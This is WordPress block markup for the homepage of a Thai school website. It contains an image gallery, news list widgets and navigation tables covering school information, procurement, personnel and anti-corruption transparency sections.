{\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8